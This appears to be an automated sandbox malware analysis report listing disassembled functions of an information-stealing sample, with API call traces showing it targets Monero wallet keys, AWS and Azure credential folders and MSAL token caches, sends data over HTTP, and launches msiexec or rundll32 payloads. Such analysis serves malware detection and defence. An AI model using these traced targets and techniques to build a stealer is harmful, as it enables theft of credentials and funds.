                                • Associated: 00000000.00000002.1310379765.0000000000C30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000CE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000CED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000E7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001014000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.00000000010EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001110000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001117000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001126000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1311295036.0000000001127000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1311460333.00000000012BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                                • String ID:
                                • API String ID: 1956182324-0
                                • Opcode ID: 130810c6f78677b22552bd8b4153f5ae68485a9b7744911e02a8bcc3113ccbee
                                • Instruction ID: 50a76bf17388e228426aad75e066a3b5aa96bba362bdbcfc189deb902b505ef6
                                • Opcode Fuzzy Hash: 130810c6f78677b22552bd8b4153f5ae68485a9b7744911e02a8bcc3113ccbee
                                • Instruction Fuzzy Hash: 73E14C71950108AFEB08EBA1DD9AEEE7378FF54301F144168F507B6091DE34AE49EB62
                                Function 00C34880 Relevance: 28.5, APIs: 11, Strings: 5, Instructions: 479networkstringfileCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00C4A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00C4A7E6
                                  • Part of subcall function 00C347B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00C34839
                                  • Part of subcall function 00C347B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00C34849
                                  • Part of subcall function 00C4A740: lstrcpy.KERNEL32(00C50E17,00000000), ref: 00C4A788
                                • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00C34915
                                • StrCmpCA.SHLWAPI(?,019FF380), ref: 00C3493A
                                • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00C34ABA
                                • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,00C50DDB,00000000,?,?,00000000,?,",00000000,?,019FF230), ref: 00C34DE8
                                • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00C34E04
                                • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00C34E18
                                • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00C34E49
                                • InternetCloseHandle.WININET(00000000), ref: 00C34EAD
                                • InternetCloseHandle.WININET(00000000), ref: 00C34EC5
                                • HttpOpenRequestA.WININET(00000000,019FF1E0,?,019FECB8,00000000,00000000,00400100,00000000), ref: 00C34B15
                                  • Part of subcall function 00C4A9B0: lstrlen.KERNEL32(?,019F8A88,?,\Monero\wallet.keys,00C50E17), ref: 00C4A9C5
                                  • Part of subcall function 00C4A9B0: lstrcpy.KERNEL32(00000000), ref: 00C4AA04
                                  • Part of subcall function 00C4A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00C4AA12
                                  • Part of subcall function 00C4A8A0: lstrcpy.KERNEL32(?,00C50E17), ref: 00C4A905
                                  • Part of subcall function 00C4A920: lstrcpy.KERNEL32(00000000,?), ref: 00C4A972
                                  • Part of subcall function 00C4A920: lstrcat.KERNEL32(00000000), ref: 00C4A982
                                • InternetCloseHandle.WININET(00000000), ref: 00C34ECF
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1310468035.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                • Associated: 00000000.00000002.1310379765.0000000000C30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000CE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000CED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000E7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001014000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.00000000010EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001110000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001117000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001126000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1311295036.0000000001127000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1311460333.00000000012BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                                • String ID: "$"$------$------$------
                                • API String ID: 460715078-2180234286
                                • Opcode ID: cd0b9fbbd40b0d4a9df14bb02664bf49e5cab4bfb4a62b20c006c51b682b1dcd
                                • Instruction ID: 422e796f6253694162592d319c489ffa0b60509184ce27af1805af65e2b0661b
                                • Opcode Fuzzy Hash: cd0b9fbbd40b0d4a9df14bb02664bf49e5cab4bfb4a62b20c006c51b682b1dcd
                                • Instruction Fuzzy Hash: D412ED72950218AAEB15EB90DC92FEEB778FF54300F5041A9B50672091EF702F89DF66
                                Function 00C3C990 Relevance: 24.9, APIs: 13, Strings: 1, Instructions: 384filestringCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00C4A740: lstrcpy.KERNEL32(00C50E17,00000000), ref: 00C4A788
                                  • Part of subcall function 00C4A920: lstrcpy.KERNEL32(00000000,?), ref: 00C4A972
                                  • Part of subcall function 00C4A920: lstrcat.KERNEL32(00000000), ref: 00C4A982
                                  • Part of subcall function 00C4A8A0: lstrcpy.KERNEL32(?,00C50E17), ref: 00C4A905
                                  • Part of subcall function 00C4A9B0: lstrlen.KERNEL32(?,019F8A88,?,\Monero\wallet.keys,00C50E17), ref: 00C4A9C5
                                  • Part of subcall function 00C4A9B0: lstrcpy.KERNEL32(00000000), ref: 00C4AA04
                                  • Part of subcall function 00C4A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00C4AA12
                                • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,019FD680,00000000,?,00C5144C,00000000,?,?), ref: 00C3CA6C
                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 00C3CA89
                                • GetFileSize.KERNEL32(00000000,00000000), ref: 00C3CA95
                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00C3CAA8
                                • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 00C3CAD9
                                • StrStrA.SHLWAPI(?,019FD770,00C50B52), ref: 00C3CAF7
                                • StrStrA.SHLWAPI(00000000,019FD788), ref: 00C3CB1E
                                • StrStrA.SHLWAPI(?,019FDD60,00000000,?,00C51458,00000000,?,00000000,00000000,?,019F8AF8,00000000,?,00C51454,00000000,?), ref: 00C3CCA2
                                • StrStrA.SHLWAPI(00000000,019FDD00), ref: 00C3CCB9
                                  • Part of subcall function 00C3C820: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 00C3C871
                                  • Part of subcall function 00C3C820: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 00C3C87C
                                • StrStrA.SHLWAPI(?,019FDD00,00000000,?,00C5145C,00000000,?,00000000,019F8AE8), ref: 00C3CD5A
                                • StrStrA.SHLWAPI(00000000,019F8A38), ref: 00C3CD71
                                  • Part of subcall function 00C3C820: lstrcat.KERNEL32(?,00C50B46), ref: 00C3C943
                                  • Part of subcall function 00C3C820: lstrcat.KERNEL32(?,00C50B47), ref: 00C3C957
                                  • Part of subcall function 00C3C820: lstrcat.KERNEL32(?,00C50B4E), ref: 00C3C978
                                • lstrlen.KERNEL32(00000000), ref: 00C3CE44
                                • CloseHandle.KERNEL32(00000000), ref: 00C3CE9C
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1310468035.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                • Associated: 00000000.00000002.1310379765.0000000000C30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000CE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000CED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000E7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001014000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.00000000010EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001110000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001117000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001126000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1311295036.0000000001127000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1311460333.00000000012BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$BinaryCloseCreateCryptHandleReadSizeString
                                • String ID:
                                • API String ID: 3744635739-3916222277
                                • Opcode ID: a782675d205d316fab0c982b30eaedbc4a54565520a08f8d43acdd388b6c2a58
                                • Instruction ID: 8196885144d3cfe117af37b97023c9249a8074c35882ac5b250bf2e4075b17fd
                                • Opcode Fuzzy Hash: a782675d205d316fab0c982b30eaedbc4a54565520a08f8d43acdd388b6c2a58
                                • Instruction Fuzzy Hash: 26E1EB71950108AFEB14EBA0DC96FEEB778FF54300F444169F506B6191EF306A8ADB62
                                Function 00C48320 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 196registryCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00C4A740: lstrcpy.KERNEL32(00C50E17,00000000), ref: 00C4A788
                                • RegOpenKeyExA.ADVAPI32(00000000,019FB8C8,00000000,00020019,00000000,00C505B6), ref: 00C483A4
                                • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00C48426
                                • wsprintfA.USER32 ref: 00C48459
                                • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 00C4847B
                                • RegCloseKey.ADVAPI32(00000000), ref: 00C4848C
                                • RegCloseKey.ADVAPI32(00000000), ref: 00C48499
                                  • Part of subcall function 00C4A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00C4A7E6
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1310468035.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                • Associated: 00000000.00000002.1310379765.0000000000C30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000CE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000CED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000E7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001014000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.00000000010EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001110000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001117000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001126000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1311295036.0000000001127000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1311460333.00000000012BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseOpenlstrcpy$Enumwsprintf
                                • String ID: - $%s\%s$?
                                • API String ID: 3246050789-3278919252
                                • Opcode ID: 26b44ce7e1045f8840a5c56a5a91d38c64286ab64a5d02d3683a91d9e8fbcffd
                                • Instruction ID: 2ceb71322006e354ce8cb2ac69abd507c3578fcc0e2e5a13591771481cb056e7
                                • Opcode Fuzzy Hash: 26b44ce7e1045f8840a5c56a5a91d38c64286ab64a5d02d3683a91d9e8fbcffd
                                • Instruction Fuzzy Hash: 7D81FBB1950118AFEB28DB54CC95FEEB7B8FF48700F008299E509A6180DF716B89CF95
                                Function 00C44D70 Relevance: 22.6, APIs: 6, Strings: 9, Instructions: 123stringCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00C48DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00C48E0B
                                • lstrcat.KERNEL32(?,00000000), ref: 00C44DB0
                                • lstrcat.KERNEL32(?,\.azure\), ref: 00C44DCD
                                  • Part of subcall function 00C44910: wsprintfA.USER32 ref: 00C4492C
                                  • Part of subcall function 00C44910: FindFirstFileA.KERNEL32(?,?), ref: 00C44943
                                • lstrcat.KERNEL32(?,00000000), ref: 00C44E3C
                                • lstrcat.KERNEL32(?,\.aws\), ref: 00C44E59
                                  • Part of subcall function 00C44910: StrCmpCA.SHLWAPI(?,00C50FDC), ref: 00C44971
                                  • Part of subcall function 00C44910: StrCmpCA.SHLWAPI(?,00C50FE0), ref: 00C44987
                                  • Part of subcall function 00C44910: FindNextFileA.KERNEL32(000000FF,?), ref: 00C44B7D
                                  • Part of subcall function 00C44910: FindClose.KERNEL32(000000FF), ref: 00C44B92
                                • lstrcat.KERNEL32(?,00000000), ref: 00C44EC8
                                • lstrcat.KERNEL32(?,\.IdentityService\), ref: 00C44EE5
                                  • Part of subcall function 00C44910: wsprintfA.USER32 ref: 00C449B0
                                  • Part of subcall function 00C44910: StrCmpCA.SHLWAPI(?,00C508D2), ref: 00C449C5
                                  • Part of subcall function 00C44910: wsprintfA.USER32 ref: 00C449E2
                                  • Part of subcall function 00C44910: PathMatchSpecA.SHLWAPI(?,?), ref: 00C44A1E
                                  • Part of subcall function 00C44910: lstrcat.KERNEL32(?,019FF2E0), ref: 00C44A4A
                                  • Part of subcall function 00C44910: lstrcat.KERNEL32(?,00C50FF8), ref: 00C44A5C
                                  • Part of subcall function 00C44910: lstrcat.KERNEL32(?,?), ref: 00C44A70
                                  • Part of subcall function 00C44910: lstrcat.KERNEL32(?,00C50FFC), ref: 00C44A82
                                  • Part of subcall function 00C44910: lstrcat.KERNEL32(?,?), ref: 00C44A96
                                  • Part of subcall function 00C44910: CopyFileA.KERNEL32(?,?,00000001), ref: 00C44AAC
                                  • Part of subcall function 00C44910: DeleteFileA.KERNEL32(?), ref: 00C44B31
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1310468035.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                • Associated: 00000000.00000002.1310379765.0000000000C30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000CE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000CED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000E7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001014000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.00000000010EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001110000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001117000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001126000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1311295036.0000000001127000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1311460333.00000000012BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$File$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                                • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                                • API String ID: 949356159-974132213
                                • Opcode ID: 6c9518ee65fa18c193bf0bbed5a190b471b58521494ec746e15cdec868f38c77
                                • Instruction ID: 5b7216df55eab44218b037bc92060e1e23b28892ce8d3d26a38a21c4f1040a20
                                • Opcode Fuzzy Hash: 6c9518ee65fa18c193bf0bbed5a190b471b58521494ec746e15cdec868f38c77
                                • Instruction Fuzzy Hash: 8841767A9402046BD754F7B0DC4BFED7338ABA4701F444464BA4AA60C1EEB49BCDDB92
                                Function 00C49010 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 184COMMON
                                Download Yara Rule
                                APIs
                                • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 00C4906C
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1310468035.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                • Associated: 00000000.00000002.1310379765.0000000000C30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000CE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000CED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000E7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001014000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.00000000010EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001110000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001117000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001126000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1311295036.0000000001127000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1311460333.00000000012BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: CreateGlobalStream
                                • String ID: image/jpeg
                                • API String ID: 2244384528-3785015651
                                • Opcode ID: 6a70c9083a62d0b9846de7b2c33636ea74cd36e5fec9d6b9040a3447aad30326
                                • Instruction ID: 0c4975aa578897efcbc270441f062e2a61be49fdf1c2f49e99e521e1a1946bdc
                                • Opcode Fuzzy Hash: 6a70c9083a62d0b9846de7b2c33636ea74cd36e5fec9d6b9040a3447aad30326
                                • Instruction Fuzzy Hash: 5F71EC71910208AFDB14EFE5DC89FEEB7B8FB88700F148518F519A7290DB74A945CB61
                                Function 00C42E30 Relevance: 19.7, APIs: 3, Strings: 8, Instructions: 469COMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00C4A740: lstrcpy.KERNEL32(00C50E17,00000000), ref: 00C4A788
                                • ShellExecuteEx.SHELL32(0000003C), ref: 00C431C5
                                • ShellExecuteEx.SHELL32(0000003C), ref: 00C4335D
                                • ShellExecuteEx.SHELL32(0000003C), ref: 00C434EA
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1310468035.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                • Associated: 00000000.00000002.1310379765.0000000000C30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000CE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000CED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000E7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001014000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.00000000010EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001110000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001117000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001126000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1311295036.0000000001127000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1311460333.00000000012BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: ExecuteShell$lstrcpy
                                • String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
                                • API String ID: 2507796910-3625054190
                                • Opcode ID: cd798cefcd8475cb59476299800749aebc8d7806e224502a7f0651cdaec88e15
                                • Instruction ID: 7da1bb2cbfbf591d0023178cdbfae83a4c8c3167be822fdb97b8955d97e0433d
                                • Opcode Fuzzy Hash: cd798cefcd8475cb59476299800749aebc8d7806e224502a7f0651cdaec88e15
                                • Instruction Fuzzy Hash: D412EC71850108AAEB19FBA0DC92FEDB778BF64300F504169F50666191EF742B8EDF62
                                Function 00C452C0 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 139stringCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00C4A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00C4A7E6
                                  • Part of subcall function 00C36280: InternetOpenA.WININET(00C50DFE,00000001,00000000,00000000,00000000), ref: 00C362E1
                                  • Part of subcall function 00C36280: StrCmpCA.SHLWAPI(?,019FF380), ref: 00C36303
                                  • Part of subcall function 00C36280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00C36335
                                  • Part of subcall function 00C36280: HttpOpenRequestA.WININET(00000000,GET,?,019FECB8,00000000,00000000,00400100,00000000), ref: 00C36385
                                  • Part of subcall function 00C36280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00C363BF
                                  • Part of subcall function 00C36280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00C363D1
                                  • Part of subcall function 00C4A8A0: lstrcpy.KERNEL32(?,00C50E17), ref: 00C4A905
                                • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00C45318
                                • lstrlen.KERNEL32(00000000), ref: 00C4532F
                                  • Part of subcall function 00C48E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00C48E52
                                • StrStrA.SHLWAPI(00000000,00000000), ref: 00C45364
                                • lstrlen.KERNEL32(00000000), ref: 00C45383
                                • lstrlen.KERNEL32(00000000), ref: 00C453AE
                                  • Part of subcall function 00C4A740: lstrcpy.KERNEL32(00C50E17,00000000), ref: 00C4A788
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1310468035.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                • Associated: 00000000.00000002.1310379765.0000000000C30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000CE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000CED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000E7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001014000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.00000000010EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001110000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001117000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001126000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1311295036.0000000001127000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1311460333.00000000012BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSend
                                • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                                • API String ID: 3240024479-1526165396
                                • Opcode ID: 28cc2e83db00074d80275a24d89ce337da83a11853b90a7489891ec5d43c0e62
                                • Instruction ID: 82a16b80d9e0f919edabf88b2efa201ae8084617ff3f7c9b81d888f7441f5989
                                • Opcode Fuzzy Hash: 28cc2e83db00074d80275a24d89ce337da83a11853b90a7489891ec5d43c0e62
                                • Instruction Fuzzy Hash: B8511D309501489FEB18FF61CD96AED7779FF50305F504028F80A6A592EF346B49EB62
                                Function 00C412D0 Relevance: 16.8, APIs: 11, Instructions: 310COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.1310468035.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                • Associated: 00000000.00000002.1310379765.0000000000C30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000CE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000CED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000E7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001014000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.00000000010EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001110000.00000040.00000001.01000000.00000003.sdmpDownload File
